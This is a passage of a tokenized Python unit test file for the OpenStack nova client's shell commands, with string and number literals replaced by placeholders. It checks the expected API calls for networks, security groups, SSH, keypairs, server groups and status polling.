<EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_vlan ( self ) : <EOL> self . 
run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:200> } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_vlan_start ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_extra_args ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_tenant_network_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_tenant_network_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_tenant_network_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_tenant_network_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_add_fixed_ip ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> def test_remove_fixed_ip ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_backup ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> def test_absolute_limits ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_limits ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> stdout , _ = self . run_command ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , stdout ) <EOL> self . assertIn ( '<STR_LIT:Name>' , stdout ) <EOL> def test_evacuate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } ) <EOL> def test_evacuate_with_no_target_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : False } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } ) <EOL> def test_get_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_get_password_without_key ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_clear_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_availability_zone_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_security_group_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' } } ) <EOL> def test_security_group_update ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' } } ) <EOL> def test_security_group_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_security_group_add_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None } } ) <EOL> def test_security_group_delete_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_delete_rule_protocol_case ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_add_group_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:2> } } ) <EOL> def test_security_group_delete_valid_group_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_delete_valid_group_rule_protocol_case ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_delete_invalid_group_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_delete_invalid_group_rule_protocol_case ( self ) : <EOL> self . 
run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_list_rules ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_security_group_list_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_security_group_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_server_security_group_add ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } ) <EOL> def test_server_security_group_remove ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } ) <EOL> def test_server_security_group_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_interface_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_interface_attach ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_interface_detach ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_volume_attachments ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_volume_attach ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_volume_attach_without_device ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_volume_update ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_volume_detach ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_instance_action_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_instance_action_get ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_cell_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_cell_capacities_with_cell_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_cell_capacities_without_cell_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_migration_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_migration_list_v223 ( self ) : <EOL> self . run_command ( '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_migration_list_with_filters ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_ssh ( self , mock_system , mock_find_server ) : <EOL> class FakeResources ( object ) : <EOL> addresses = { <EOL> "<STR_LIT>" : [ <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:6> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:6> , '<STR_LIT>' : "<STR_LIT>" } <EOL> ] <EOL> } <EOL> mock_find_server . return_value = FakeResources ( ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . 
assert_called_with ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_ssh_multinet ( self , mock_system , mock_find_server ) : <EOL> class FakeResources ( object ) : <EOL> addresses = { <EOL> "<STR_LIT>" : [ <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:6> , '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : '<STR_LIT>' } <EOL> ] , <EOL> "<STR_LIT>" : [ <EOL> { '<STR_LIT:version>' : <NUM_LIT:4> , '<STR_LIT>' : "<STR_LIT>" } , <EOL> { '<STR_LIT:version>' : <NUM_LIT:6> , '<STR_LIT>' : "<STR_LIT>" } <EOL> ] <EOL> } <EOL> mock_find_server . return_value = FakeResources ( ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . run_command ( "<STR_LIT>" ) <EOL> mock_system . assert_called_with ( "<STR_LIT>" ) <EOL> self . assertRaises ( exceptions . ResourceNotFound , <EOL> self . run_command , <EOL> "<STR_LIT>" ) <EOL> def _check_keypair_add ( self , expected_key_type = None , extra_args = '<STR_LIT>' , <EOL> api_version = None ) : <EOL> self . run_command ( "<STR_LIT>" % extra_args , <EOL> api_version = api_version ) <EOL> expected_body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT:test>" } } <EOL> if expected_key_type : <EOL> expected_body [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] = expected_key_type <EOL> self . assert_called ( "<STR_LIT:POST>" , "<STR_LIT>" , expected_body ) <EOL> def test_keypair_add_v20 ( self ) : <EOL> self . _check_keypair_add ( api_version = "<STR_LIT>" ) <EOL> def test_keypair_add_v22 ( self ) : <EOL> self . _check_keypair_add ( '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def test_keypair_add_ssh ( self ) : <EOL> self . 
_check_keypair_add ( '<STR_LIT>' , '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def test_keypair_add_ssh_x509 ( self ) : <EOL> self . _check_keypair_add ( '<STR_LIT>' , '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def _check_keypair_import ( self , expected_key_type = None , extra_args = '<STR_LIT>' , <EOL> api_version = None ) : <EOL> with mock . patch . object ( builtins , '<STR_LIT>' , <EOL> mock . mock_open ( read_data = '<STR_LIT>' ) ) : <EOL> self . run_command ( '<STR_LIT>' % <EOL> extra_args , api_version = api_version ) <EOL> expected_body = { "<STR_LIT>" : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT:test>' } } <EOL> if expected_key_type : <EOL> expected_body [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] = expected_key_type <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , expected_body ) <EOL> def test_keypair_import_v20 ( self ) : <EOL> self . _check_keypair_import ( api_version = "<STR_LIT>" ) <EOL> def test_keypair_import_v22 ( self ) : <EOL> self . _check_keypair_import ( '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def test_keypair_import_ssh ( self ) : <EOL> self . _check_keypair_import ( '<STR_LIT>' , '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> def test_keypair_import_x509 ( self ) : <EOL> self . _check_keypair_import ( '<STR_LIT>' , '<STR_LIT>' , <EOL> api_version = "<STR_LIT>" ) <EOL> def test_keypair_stdin ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , six . StringIO ( '<STR_LIT>' ) ) : <EOL> self . run_command ( '<STR_LIT>' , api_version = "<STR_LIT>" ) <EOL> self . assert_called ( <EOL> '<STR_LIT:POST>' , '<STR_LIT>' , { <EOL> '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:name>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } } ) <EOL> def test_keypair_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_keypair_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_keypair_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_create_server_group ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } } ) <EOL> def test_delete_multi_server_groups ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> def test_list_server_group ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_server_group_with_all_projects ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_list_server_os_virtual_interfaces ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_versions ( self ) : <EOL> exclusions = set ( [ <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:3> , <EOL> <NUM_LIT:5> , <EOL> <NUM_LIT:7> , <EOL> <NUM_LIT:9> , <EOL> <NUM_LIT:15> , <EOL> <NUM_LIT:16> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT:20> , <EOL> ] ) <EOL> versions_supported = set ( range ( <NUM_LIT:0> , <EOL> novaclient . API_MAX_VERSION . ver_minor + <NUM_LIT:1> ) ) <EOL> versions_covered = set ( ) <EOL> for key , values in api_versions . _SUBSTITUTIONS . items ( ) : <EOL> for value in values : <EOL> if value . start_version . ver_major == <NUM_LIT:2> : <EOL> versions_covered . add ( value . start_version . 
ver_minor ) <EOL> versions_not_covered = versions_supported - versions_covered <EOL> unaccounted_for = versions_not_covered - exclusions <EOL> failure_msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % sorted ( unaccounted_for ) ) <EOL> self . assertEqual ( set ( [ ] ) , unaccounted_for , failure_msg ) <EOL> def test_list_v2_10 ( self ) : <EOL> self . run_command ( '<STR_LIT:list>' , api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> class ShellWithSessionClientTest ( ShellTest ) : <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ShellWithSessionClientTest , self ) . setUp ( ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( <EOL> '<STR_LIT>' , <EOL> lambda * args , ** kwargs : fakes . FakeSessionClient ( * args , ** kwargs ) ) ) <EOL> class GetSecgroupTest ( utils . TestCase ) : <EOL> def test_with_integer ( self ) : <EOL> cs = mock . Mock ( ** { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> } ) <EOL> result = novaclient . v2 . shell . _get_secgroup ( cs , '<STR_LIT:1>' ) <EOL> self . assertEqual ( '<STR_LIT>' , result ) <EOL> cs . security_groups . get . assert_called_once_with ( '<STR_LIT:1>' ) <EOL> def test_with_uuid ( self ) : <EOL> cs = mock . Mock ( ** { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> } ) <EOL> result = novaclient . v2 . shell . _get_secgroup ( <EOL> cs , '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , result ) <EOL> cs . security_groups . get . assert_called_once_with ( <EOL> '<STR_LIT>' ) <EOL> def test_with_an_nonexisting_name ( self ) : <EOL> cs = mock . Mock ( ** { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> } ) <EOL> self . assertRaises ( exceptions . CommandError , <EOL> novaclient . v2 . shell . _get_secgroup , <EOL> cs , <EOL> '<STR_LIT:abc>' ) <EOL> def test_with_non_unique_name ( self ) : <EOL> group_one = mock . MagicMock ( ) <EOL> group_one . name = '<STR_LIT>' <EOL> cs = mock . 
Mock ( ** { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ group_one , group_one ] , <EOL> } ) <EOL> self . assertRaises ( exceptions . NoUniqueMatch , <EOL> novaclient . v2 . shell . _get_secgroup , <EOL> cs , <EOL> '<STR_LIT>' ) <EOL> class GetFirstEndpointTest ( utils . TestCase ) : <EOL> def test_only_one_endpoint ( self ) : <EOL> endpoint = { "<STR_LIT:url>" : "<STR_LIT:test>" } <EOL> result = novaclient . v2 . shell . _get_first_endpoint ( [ endpoint ] , "<STR_LIT>" ) <EOL> self . assertEqual ( endpoint , result ) <EOL> def test_multiple_endpoints ( self ) : <EOL> endpoints = [ <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:1> } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:2> } <EOL> ] <EOL> result = novaclient . v2 . shell . _get_first_endpoint ( endpoints , "<STR_LIT>" ) <EOL> self . assertEqual ( endpoints [ <NUM_LIT:1> ] , result ) <EOL> def test_multiple_endpoints_but_none_suitable ( self ) : <EOL> endpoints = [ <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" } <EOL> ] <EOL> self . assertRaises ( LookupError , <EOL> novaclient . v2 . shell . _get_first_endpoint , <EOL> endpoints , "<STR_LIT>" ) <EOL> def test_no_endpoints ( self ) : <EOL> self . assertRaises ( LookupError , <EOL> novaclient . v2 . shell . _get_first_endpoint , <EOL> [ ] , "<STR_LIT>" ) <EOL> class PollForStatusTestCase ( utils . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_simple_usage ( self , mock_time ) : <EOL> poll_period = <NUM_LIT:3> <EOL> some_id = "<STR_LIT>" <EOL> updated_objects = ( <EOL> base . Resource ( None , info = { "<STR_LIT>" : "<STR_LIT>" } ) , <EOL> base . Resource ( None , info = { "<STR_LIT>" : "<STR_LIT:OK>" } ) ) <EOL> poll_fn = mock . MagicMock ( side_effect = updated_objects ) <EOL> novaclient . v2 . shell . 
_poll_for_status ( <EOL> poll_fn = poll_fn , <EOL> obj_id = some_id , <EOL> status_field = "<STR_LIT>" , <EOL> final_ok_states = [ "<STR_LIT>" ] , <EOL> poll_period = poll_period , <EOL> action = "<STR_LIT>" , <EOL> silent = True , <EOL> show_progress = False <EOL> ) <EOL> self . assertEqual ( [ mock . call ( poll_period ) ] , <EOL> mock_time . sleep . call_args_list ) <EOL> self . assertEqual ( [ mock . call ( some_id ) ] * <NUM_LIT:2> , poll_fn . call_args_list ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_print_progress ( self , mock_time , mock_stdout ) : <EOL> updated_objects = ( <EOL> base . Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:0> } ) , <EOL> base . Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:50> } ) , <EOL> base . Resource ( None , info = { "<STR_LIT:status>" : "<STR_LIT:OK>" , "<STR_LIT>" : <NUM_LIT:100> } ) ) <EOL> poll_fn = mock . MagicMock ( side_effect = updated_objects ) <EOL> action = "<STR_LIT>" <EOL> novaclient . v2 . shell . _poll_for_status ( <EOL> poll_fn = poll_fn , <EOL> obj_id = "<STR_LIT>" , <EOL> final_ok_states = [ "<STR_LIT>" ] , <EOL> poll_period = 